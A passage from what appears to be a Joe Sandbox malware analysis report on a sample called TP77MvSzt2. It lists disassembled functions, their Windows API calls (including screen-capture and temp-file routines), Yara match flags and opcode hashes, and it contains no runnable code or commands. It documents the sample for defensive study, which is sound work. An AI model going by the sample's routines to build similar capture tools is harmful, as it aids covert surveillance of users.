                                                                                  • Instruction Fuzzy Hash: 93F0AF32A10304DFEB00EF6CD805B5D3BE0AF45715F104665FA00DB2E1CBB9AA44CB4A
                                                                                  Function 0043B2A2 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                  • EnumSystemLocalesW.KERNEL32(0043B1F9,00000001,?,?,?,0043BA64,004307D5,?,?,?,?,?,004307D5,?,?,?), ref: 0043B2D9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                  • String ID:
                                                                                  • API String ID: 2016158738-0
                                                                                  • Opcode ID: 5abaff1671bb674c6eafe0f2cce25488b1c0be8fa004c8119abb9d1d27339480
                                                                                  • Instruction ID: 792a508546450a8c62dd781f30710cea9d26762123306e32df2f83f98e4bbb46
                                                                                  • Opcode Fuzzy Hash: 5abaff1671bb674c6eafe0f2cce25488b1c0be8fa004c8119abb9d1d27339480
                                                                                  • Instruction Fuzzy Hash: 62F0203A30020497CB04AF7AD85A76BBF90EBC5B54F0A409AEF098B250C6399842C798
                                                                                  Function 0486B509 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 04862161: GetLastError.KERNEL32(?,?,0485AA0C,?,00000000,?,0485CE06,0483249A,00000000,?,00451F20), ref: 04862165
                                                                                    • Part of subcall function 04862161: _free.LIBCMT ref: 04862198
                                                                                    • Part of subcall function 04862161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 048621D9
                                                                                  • EnumSystemLocalesW.KERNEL32(0043B1F9,00000001,?,?,?,0486BCCB,04860A3C,?,?,?,?,?,04860A3C,?,?,?), ref: 0486B540
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                  • String ID:
                                                                                  • API String ID: 2016158738-0
                                                                                  • Opcode ID: 7e45c69b4bd48ea0a58e1bc64ad8673d17a770c848b88e6c6a4e287bad9e638c
                                                                                  • Instruction ID: 154bc09c86d8756be8f372c41f47be71f76fcb45142b99b87e0f454213ad7c99
                                                                                  • Opcode Fuzzy Hash: 7e45c69b4bd48ea0a58e1bc64ad8673d17a770c848b88e6c6a4e287bad9e638c
                                                                                  • Instruction Fuzzy Hash: 00F05C3630020457CB04AF79DC0876A7F90EFC1754F060059EF06CB240C271F442C790
                                                                                  Function 00410686 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00010692,0040FC1E), ref: 0041068B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  • Opcode ID: 6cf26b4471ecbc88141dfed73a91e81ad7907fcfa0cdea6a3473b6b210d5516f
                                                                                  • Instruction ID: 98c1b70154c3c6394ebbf277c14e22134dfc73ab602bc766ac458664b600bd4b
                                                                                  • Opcode Fuzzy Hash: 6cf26b4471ecbc88141dfed73a91e81ad7907fcfa0cdea6a3473b6b210d5516f
                                                                                  • Instruction Fuzzy Hash:
                                                                                  Function 048408ED Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00410692,0483FE85), ref: 048408F2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  • Opcode ID: 6cf26b4471ecbc88141dfed73a91e81ad7907fcfa0cdea6a3473b6b210d5516f
                                                                                  • Instruction ID: 98c1b70154c3c6394ebbf277c14e22134dfc73ab602bc766ac458664b600bd4b
                                                                                  • Opcode Fuzzy Hash: 6cf26b4471ecbc88141dfed73a91e81ad7907fcfa0cdea6a3473b6b210d5516f
                                                                                  • Instruction Fuzzy Hash:
                                                                                  Function 0043BBE1 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapProcess
                                                                                  • String ID:
                                                                                  • API String ID: 54951025-0
                                                                                  • Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                  • Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
                                                                                  • Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                  • Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
                                                                                  Function 004373F9 Relevance: .6, Instructions: 637COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                  • Instruction ID: b4093df590a21e34b028a8b1fc7d27a52c9cbab165512cb59d6a43ae298a81d2
                                                                                  • Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                  • Instruction Fuzzy Hash: 61324661D68F014DE7339634C822336A698AFBB3D4F15E737F859B5EA6EB28C4834105
                                                                                  Function 004071D0 Relevance: .4, Instructions: 378COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e46bd4f707ba7a9ceb031d9cd86521102eb103cae0c179e5e6aa0592395d1ff4
                                                                                  • Instruction ID: 8d7dcf63c468df939a74f501716ec15b8f2183c69ee07cfca9113f75d84f5853
                                                                                  • Opcode Fuzzy Hash: e46bd4f707ba7a9ceb031d9cd86521102eb103cae0c179e5e6aa0592395d1ff4
                                                                                  • Instruction Fuzzy Hash: C3E19270A08612EFD714CF24C590AAAB7F1FF44304B14456ED856ABB81D738FC61DB96
                                                                                  Function 0485770B Relevance: .4, Instructions: 356COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 00d6ba4a2d84f0801e1b0a96c170955ef3db55fa66fb4acd58968073f34e18d5
                                                                                  • Instruction ID: c76e0d6d5e685436edb54830178ac8e3711af84bf5607d347098698f66ee85ba
                                                                                  • Opcode Fuzzy Hash: 00d6ba4a2d84f0801e1b0a96c170955ef3db55fa66fb4acd58968073f34e18d5
                                                                                  • Instruction Fuzzy Hash: 9BD1BB722081A24DCB2E4E398470036BFE15A4216171D8F9EDCF7CB5E6ED14F564D660
                                                                                  Function 00427D87 Relevance: .3, Instructions: 254COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                  • Instruction ID: 80968e5e8bc017810328c9ff139e3a08396a4cd6bf5f0c598f5f88a651707172
                                                                                  • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                  • Instruction Fuzzy Hash: C691743230D0B34ADB29463DA53413FFFE15E523A139A079FE4F2CA2C5EE289954D624
                                                                                  Function 04857FEE Relevance: .3, Instructions: 254COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                  • Instruction ID: e8b989c11c55952a055f1e4118d497021338d8b6e19a01740391cd17511a5f0d
                                                                                  • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                  • Instruction Fuzzy Hash: 2D9154722090A34ADB69663A847403EFFE15B412A571A0F9FD8F3CB5E5FE24E174D620
                                                                                  Function 00428042 Relevance: .2, Instructions: 244COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                  • Instruction ID: 6d209accfb2b0f61ed35da4827d98296029fd821660f9634528c43e98a7d9207
                                                                                  • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                  • Instruction Fuzzy Hash: D491933230A0B34ADB69423D947403FFFE15A523A135A079FD4F2CA2C5EE189569E638
                                                                                  Function 048582A9 Relevance: .2, Instructions: 244COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                  • Instruction ID: 2e5bc8555bedf3071c0b1124f76d72fd641b32580013123c45ed0f0c0e7541bd
                                                                                  • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                  • Instruction Fuzzy Hash: 6C9132722090A34ADB69563E857407EFFE15B422A170A1F9FDCF2CA1E5FE24E174D620
                                                                                  Function 00427AC0 Relevance: .2, Instructions: 240COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                  • Instruction ID: c950a799e81b9798c69e1fde7feb5263e7a66bddbd8f12dc999fd4da67e98d8e
                                                                                  • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                  • Instruction Fuzzy Hash: 02915F7230D0B34ADB29463EA47403EFFE15A523A539A079FD4F2CB2C1EE189665D624
                                                                                  Function 04857D27 Relevance: .2, Instructions: 240COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                  • Instruction ID: ba7e859de8bf143e2093f06ea9144bfdb5315f96c0a6ddf9f54444049a62210e
                                                                                  • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                  • Instruction Fuzzy Hash: 419186722091A30EDB2D8639857443EFFE15B412A1B1A8F9EDCF2CB1E5FE14E5549620
                                                                                  Function 0042D50E Relevance: .2, Instructions: 237COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ae41838ee76994b482650b7261a05257237b420b1ccb6a01709a4d1c62f7e11e
                                                                                  • Instruction ID: bf5b32470415164d0bde1c399ad2a9f6c2d5fa579297b3e458aa86cae917bf69
                                                                                  • Opcode Fuzzy Hash: ae41838ee76994b482650b7261a05257237b420b1ccb6a01709a4d1c62f7e11e
                                                                                  • Instruction Fuzzy Hash: 5F6132A1F0073866DB389A287895BBF23949F42748FE0051BE846DB3C1D69D9DC2C75E
                                                                                  Function 0485D775 Relevance: .2, Instructions: 237COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                  • Instruction ID: 05b7b94902384514a34743944c9ab2b9f709d286e1faa121fa23880fe8e2a9fe
                                                                                  • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                  • Instruction Fuzzy Hash: B7616871700709A6EB34AA2C88907BE63D5DF41748F04CF59DD82DB2F0E751B942E356
                                                                                  Function 00427816 Relevance: .2, Instructions: 232COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                  • Instruction ID: 70ade5293ce95a995033036da66bd690249c8a0141dd443be95812c5f6c87ab8
                                                                                  • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                  • Instruction Fuzzy Hash: 7381827230C0B34AEB29463E957843FFFE15A523A135A179FD4F2CA2C1EE18C694D624
                                                                                  Function 04857A7D Relevance: .2, Instructions: 232COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                  • Instruction ID: 5f72160d986f211f0e8b9fdbcd4aa10767e8abbcd874c5d9a29a05e427793295
                                                                                  • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                  • Instruction Fuzzy Hash: 478166722090E34DDB6A463D847403EFFE15B422A5B1A8F9ED8F2CB1E5FD14A564D620
                                                                                  Function 00428580 Relevance: .1, Instructions: 76COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                  • Instruction ID: 93e5daa5636be076332bd1d1c6ab8ee00e3655dcebceb5ec59e252ebbac9be67
                                                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                  • Instruction Fuzzy Hash: 69113B7730307153D6048A2DF8B45BF9795EBC53207ED426FD0418B749CE2AE9819508
                                                                                  Function 048587E7 Relevance: .1, Instructions: 76COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                  • Instruction ID: bcbb27c64bc52e75128c08017d5b8fb639ad04f0b0ae262ffd14dc21ab194d48
                                                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                  • Instruction Fuzzy Hash: 0E112B7B20104143D618AA2DD8B45BBA795EBC53A4B2C4F7BD882CB778D322F164F600
                                                                                  Function 02DA9F83 Relevance: .1, Instructions: 61COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4210942714.0000000002DA9000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DA9000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2da9000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                  • Instruction ID: f4289b886d708c8d5f588dfeef2049862722ab761ec9e2d3aea250d01dbeb95e
                                                                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                  • Instruction Fuzzy Hash: 12115E72340100AFDB54DF55DCE1EE673EAEB89324B298165ED04CB356D67AEC41CB60
                                                                                  Function 04830D90 Relevance: .0, Instructions: 43COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                  • Instruction ID: 6026edd486e57994fe523e1a90a6ef7a48f6d6970ee139dcd1fbc3fc185e2605
                                                                                  • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                  • Instruction Fuzzy Hash: 9F01A276B016048FDF21CF24C804BAA33E5FB87217F554AA5E90ADB289E774B9418BD0
                                                                                  Function 00402116 Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 205COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DefWindowProcW.USER32(?,00000014,?,?), ref: 00402151
                                                                                  • GetClientRect.USER32(?,?), ref: 00402166
                                                                                  • GetDC.USER32(?), ref: 0040216D
                                                                                  • CreateSolidBrush.GDI32(00646464), ref: 00402180
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00402194
                                                                                  • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 0040219F
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004021AD
                                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021C0
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021CB
                                                                                  • MulDiv.KERNEL32(00000008,00000000), ref: 004021D4
                                                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021F8
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00402206
                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00402283
                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00402292
                                                                                  • _wcslen.LIBCMT ref: 0040229B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                                                  • String ID: Tahoma
                                                                                  • API String ID: 3832963559-3580928618
                                                                                  • Opcode ID: abba52d6847b12fe0ef92b8c09c3f71f9fb3bd9472e68441846bf1e5ef91a6b5
                                                                                  • Instruction ID: 010c8dd0ade12b0eef00d8562bcf10ebda5dfd6cd9d9fcac1ad08c501085cdf2
                                                                                  • Opcode Fuzzy Hash: abba52d6847b12fe0ef92b8c09c3f71f9fb3bd9472e68441846bf1e5ef91a6b5
                                                                                  • Instruction Fuzzy Hash: E871FD72900228AFDB22DF64DD85FAEB7BCEB09B11F0041A5B609E6151DA74AF81CF14
                                                                                  Function 00402591 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 186windowkeyboardfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DestroyWindow.USER32(?), ref: 004025ED
                                                                                  • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025FF
                                                                                  • ReleaseCapture.USER32 ref: 00402612
                                                                                  • GetDC.USER32(00000000), ref: 00402639
                                                                                  • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026C0
                                                                                  • CreateCompatibleDC.GDI32(?), ref: 004026C9
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004026D3
                                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 00402701
                                                                                  • ShowWindow.USER32(?,00000000), ref: 0040270A
                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 0040271C
                                                                                  • GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402737
                                                                                  • DeleteFileW.KERNEL32(?), ref: 00402751
                                                                                  • DeleteDC.GDI32(00000000), ref: 00402758
                                                                                  • DeleteObject.GDI32(00000000), ref: 0040275F
                                                                                  • ReleaseDC.USER32(00000000,?), ref: 0040276D
                                                                                  • DestroyWindow.USER32(?), ref: 00402774
                                                                                  • SetCapture.USER32(?), ref: 004027C1
                                                                                  • GetDC.USER32(00000000), ref: 004027F5
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0040280B
                                                                                  • GetKeyState.USER32(0000001B), ref: 00402818
                                                                                  • DestroyWindow.USER32(?), ref: 0040282D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                                                  • String ID: gya
                                                                                  • API String ID: 2545303185-1989253062
                                                                                  • Opcode ID: 801bb6c124e375a82d20db098403c515f414ac510bec6d128129a9fc28d47c56
                                                                                  • Instruction ID: e71ef6788f7482d4de425a52166adb2a5dd74d508ff262b25753fab110ccc0fb
                                                                                  • Opcode Fuzzy Hash: 801bb6c124e375a82d20db098403c515f414ac510bec6d128129a9fc28d47c56
                                                                                  • Instruction Fuzzy Hash: 926181B5900209AFCB289F64ED48FAA7BB9FF49706F144179F605A22A2D774C941CF1C
                                                                                  Function 0042E6D2 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$Info
                                                                                  • String ID:
                                                                                  • API String ID: 2509303402-0
                                                                                  • Opcode ID: fec93888c3f7e73e0eb96cf8028c18e5ced2e8f3fd0cfc5e1e5440814fe90055
                                                                                  • Instruction ID: ea2a752c51db2b1f33c6fb20177c4d444c994d8588285db844449b2f99ea92ea
                                                                                  • Opcode Fuzzy Hash: fec93888c3f7e73e0eb96cf8028c18e5ced2e8f3fd0cfc5e1e5440814fe90055
                                                                                  • Instruction Fuzzy Hash: 7AB1C371A002159FDB11DF6AD841BEEB7F4FF18304F54452FE485AB342D77AA8418B14
                                                                                  Function 0485E939 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
